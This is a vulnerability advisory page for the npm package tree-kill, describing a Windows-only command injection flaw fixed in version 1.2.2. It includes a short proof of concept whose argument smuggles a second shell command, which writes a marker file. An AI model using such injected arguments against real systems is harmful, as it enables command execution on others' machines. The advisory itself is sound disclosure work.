Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.Test your applications
- Snyk ID SNYK-JS-TREEKILL-536781
- published 5 Dec 2019
- disclosed 4 Dec 2019
- credit mik317
How to fix?
tree-kill to version 1.2.2 or higher.
tree-kill is a package to kill all processes in the process tree, including the root process.
Affected versions of this package are vulnerable to Command Injection. User input is concatenated with a
treekill that will be executed without any check.
Note: This vulnerability is only applicable if the package is used on a Windows operating system.
PoC by mik317
Create this POC file
//poc.js var kill = require('tree-kill'); kill('3333332 & echo "HACKED" > HACKED.txt & ');
Execute the following commands in another terminal:
npm i tree-kill # Install affected module dir # Check *HACKED.txt* doesn't exist node poc.js # Run the PoC dir # Now *HACKED.txt* exists :)
A new file called
HACKED.txtwill be created, containing the